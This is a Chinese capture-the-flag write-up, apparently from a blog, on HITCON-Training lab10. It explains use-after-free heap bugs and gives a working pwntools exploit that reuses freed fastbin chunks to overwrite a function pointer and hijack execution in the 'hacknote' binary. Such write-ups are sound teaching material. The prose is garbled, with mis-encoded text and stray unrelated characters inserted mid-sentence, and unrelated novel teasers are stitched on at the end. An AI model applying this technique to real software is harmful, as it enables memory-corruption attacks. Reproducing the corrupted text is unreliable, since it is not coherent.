HITCON-Training-master lab10 wp

UAF原理:

UAF就是Use After Free,顧名思義琐谤,就是在一個(gè)堆被釋放后再次被使用不同,一般來(lái)說(shuō)有三種情況:

  1. 堆被釋放后向楼,對(duì)應(yīng)的指針被設(shè)置為null罢猪,這時(shí)再使用它程序就會(huì)崩潰
  2. 堆被釋放后授瘦,對(duì)應(yīng)的指針沒(méi)有被設(shè)置為null醋界,在它下次被使用之前沒(méi)有代碼對(duì)這塊堆進(jìn)行修改,那么程序有可能可以正常運(yùn)行
  3. 堆被釋放后提完,其對(duì)應(yīng)的指針沒(méi)有被設(shè)置為null形纺,但是它在下次使用前,有代碼對(duì)這塊堆進(jìn)行了修改徒欣,當(dāng)程序再次使用這個(gè)堆內(nèi)存時(shí)逐样,就可能會(huì)出現(xiàn)奇怪的問(wèn)題

一般的 UAF漏洞指的是后兩種情況,我們可以利用的也只有后面兩種情況

UAF漏洞利用過(guò)程:

  1. 申請(qǐng)一段空間打肝,并將其釋放脂新,釋放后的指針不清空,將這個(gè)指針簡(jiǎn)稱(chēng)為p1
  2. 申請(qǐng)空間p2粗梭, 由于malloc分配過(guò)程原則争便,使得p2指向剛剛釋放的p1的空間,構(gòu)造特殊的數(shù)據(jù)將這段內(nèi)存空間覆蓋
  3. 利用p1断医,一般會(huì)多出一個(gè)函數(shù)的指針滞乙,由于之前已經(jīng)使用p2將p1的數(shù)據(jù)給覆蓋了奏纪,所以此時(shí)p1上的數(shù)據(jù)是我們可以控制的,就存在劫持函數(shù)流的可能

下面拿HITCON的lab10做例子
程序是32的一個(gè)菜單程序
有4個(gè)選項(xiàng): add,delete,print ,exit

hacknote

查看ida反編譯代碼:

add_note

print_note_content是puts函數(shù)的一個(gè)指針:

print_note_content

程序創(chuàng)建note的時(shí)候斩启,會(huì)先分配8byte的空間來(lái)存放print_note_content和content的指針序调,然后根據(jù)輸入的size的大小分配空間給content
示意圖如下:

struct

print_note函數(shù):

print_note

delete函數(shù):

delete_note

可以發(fā)現(xiàn)它只是free了內(nèi)存,但是并沒(méi)有清空兔簇,很顯然发绢,這里存在Use After Free的情況
假設(shè)我們執(zhí)行程序如下:

def create(size,content)
create(16,'aa')
create(16,'bb')
delete(0)
delete(1)

則程序中會(huì)分配4個(gè)堆塊

malloc

free掉后因?yàn)樗鼈兊拇笮∥挥趂astbin,所以會(huì)被放到fastbin中

fastbin

此時(shí)如果我們?cè)偕暾?qǐng)一個(gè)note2,大小為0x8的話(huà),根據(jù)malloc的分配原則 男韧,它會(huì)將最近free的堆塊優(yōu)先分配朴摊,它先會(huì)給note分配8個(gè)字節(jié)的空間來(lái)存放指針,這個(gè)堆塊是note1free后的堆塊此虑,接著它會(huì)將note0存放指針的堆塊分配給note2的content甚纲,這個(gè)時(shí)候如果我們將note0的指針覆蓋成別的函數(shù)地址,再通過(guò)print_note調(diào)用的話(huà)就可以劫持函數(shù)執(zhí)行流了

note2

所以解題思路:

  1. 先create兩個(gè)note朦前,content size大小不為0x8就行了
  2. 然后將這兩個(gè)note delete掉
  3. 再創(chuàng)建一個(gè)note2介杆,大小為0x8,content內(nèi)容為magic函數(shù)
  4. 調(diào)用print_note執(zhí)行打印note0的內(nèi)容韭寸,就可以執(zhí)行magic函數(shù)了

附上exp:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
context.log_level = "debug"

p = process('./hacknote')
elf = ELF('./hacknote')

magic = 0x08048986

def create(size,content):
    p.recvuntil(":")
    p.sendline(str(1))
    p.recvuntil(":")
    p.sendline(str(size))
    p.recvuntil(":")
    p.send(content)

def delete(idx):
    p.recvuntil(":")
    p.send(str(2))
    p.recvuntil(":")
    p.sendline(str(idx))

def print_note(idx):
    p.recvuntil(":")
    p.sendline(str(3))
    p.recvuntil(":")
    p.sendline(str(idx))


create(16,'aa')
create(16,'bb')
delete(0)
delete(1)
create(8,p32(magic))
print_note(0)
p.interactive()
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末春哨,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子恩伺,更是在濱河造成了極大的恐慌赴背,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,036評(píng)論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件晶渠,死亡現(xiàn)場(chǎng)離奇詭異凰荚,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)褒脯,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,046評(píng)論 3 395
  • 文/潘曉璐 我一進(jìn)店門(mén)便瑟,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人番川,你說(shuō)我怎么就攤上這事到涂。” “怎么了颁督?”我有些...
    開(kāi)封第一講書(shū)人閱讀 164,411評(píng)論 0 354
  • 文/不壞的土叔 我叫張陵践啄,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我沉御,道長(zhǎng)往核,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,622評(píng)論 1 293
  • 正文 為了忘掉前任嚷节,我火速辦了婚禮聂儒,結(jié)果婚禮上虎锚,老公的妹妹穿的比我還像新娘。我一直安慰自己衩婚,他們只是感情好窜护,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,661評(píng)論 6 392
  • 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著非春,像睡著了一般柱徙。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上奇昙,一...
    開(kāi)封第一講書(shū)人閱讀 51,521評(píng)論 1 304
  • 那天护侮,我揣著相機(jī)與錄音,去河邊找鬼储耐。 笑死羊初,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的什湘。 我是一名探鬼主播长赞,決...
    沈念sama閱讀 40,288評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼闽撤!你這毒婦竟也來(lái)了得哆?” 一聲冷哼從身側(cè)響起,我...
    開(kāi)封第一講書(shū)人閱讀 39,200評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤哟旗,失蹤者是張志新(化名)和其女友劉穎贩据,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體闸餐,經(jīng)...
    沈念sama閱讀 45,644評(píng)論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡饱亮,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,837評(píng)論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了绎巨。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片近尚。...
    茶點(diǎn)故事閱讀 39,953評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡蠕啄,死狀恐怖场勤,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情歼跟,我是刑警寧澤和媳,帶...
    沈念sama閱讀 35,673評(píng)論 5 346
  • 正文 年R本政府宣布,位于F島的核電站哈街,受9級(jí)特大地震影響留瞳,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜骚秦,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,281評(píng)論 3 329
  • 文/蒙蒙 一她倘、第九天 我趴在偏房一處隱蔽的房頂上張望璧微。 院中可真熱鬧,春花似錦硬梁、人聲如沸前硫。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,889評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)屹电。三九已至,卻和暖如春跃巡,著一層夾襖步出監(jiān)牢的瞬間危号,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,011評(píng)論 1 269
  • 我被黑心中介騙來(lái)泰國(guó)打工素邪, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留外莲,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 48,119評(píng)論 3 370
  • 正文 我出身青樓娘香,卻偏偏與公主長(zhǎng)得像苍狰,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子烘绽,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,901評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容

  • Mommy, what is Use After Free bug? ssh uaf@pwnable.kr -p2...
    Umiade閱讀 641評(píng)論 0 0
  • iOS面試小貼士 ———————————————回答好下面的足夠了------------------------...
    不言不愛(ài)閱讀 1,980評(píng)論 0 7
  • 在11年我決定結(jié)束我的單身生活铸敏,是因?yàn)槲遗鲆?jiàn)了一個(gè)怦然心動(dòng)的人卡啰,我們開(kāi)始了一段異地的戀情,縱然是異地我也是歡喜的,...
    薛公子鳴魅閱讀 233評(píng)論 0 0
  • 不抱怨辆脸,他人的成功是他人氣運(yùn)的成熟,而你說(shuō)明明已經(jīng)很努力了蜗巧,可哈利路亞就是不來(lái)光顧你芯咧!你很氣憤,沒(méi)有了前進(jìn)的動(dòng)力胡野。...
  • 自己判斷一下,你是否符合下面幾個(gè)特征熊响? 1旨别、在人多熱鬧的場(chǎng)面容易煩躁,更喜歡一個(gè)人安靜地獨(dú)處 2汗茄、和人交流不喜歡打...
    阿何閱讀 930評(píng)論 9 34